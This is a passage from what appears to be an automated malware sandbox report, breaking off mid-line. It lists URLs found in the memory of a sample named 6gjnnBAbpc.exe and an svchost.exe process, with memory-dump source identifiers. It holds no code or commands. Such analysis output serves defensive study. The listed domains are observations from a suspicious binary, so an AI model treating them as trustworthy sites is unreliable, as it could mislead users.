00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/ui/resizable.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/wlwmanifest.xml
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/xK(
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D4D000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.670702803.0000000009FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/xmlrpc.php
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.669997099.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.669997099.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/0
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.313963475.0000000008D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.freecasinogames.me/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.418358455.0000000008DC4000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418103318.0000000008DC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/adsense/domains/caf.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.465287459.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.465287459.0000000008D92000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/P
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/%E9%98%B2%E7%88%86%E6%97%A0%E7%BA%BFAP.html
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/145.html
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=7
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=79
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=25
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=72
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313963475.0000000008D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/oKW
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.421176779.0000000008D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/563209-4053062332-1002
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/JK:
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/qK
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/UK=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.418358455.0000000008DC4000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418103318.0000000008DC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jenco.co.uk/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jroy.net/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.536954407.0000000008D6A000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418285161.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ka-mo-me.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ka-mo-me.com/S
                      Source: svchost.exe, 0000000F.00000002.641663075.00000000061DE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.kairel.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435864930.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.669997099.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465159293.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435530864.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kernsafe.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435864930.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465159293.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435530864.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kernsafe.com/h-?
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.koz1.net/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307688121.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.306520287.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 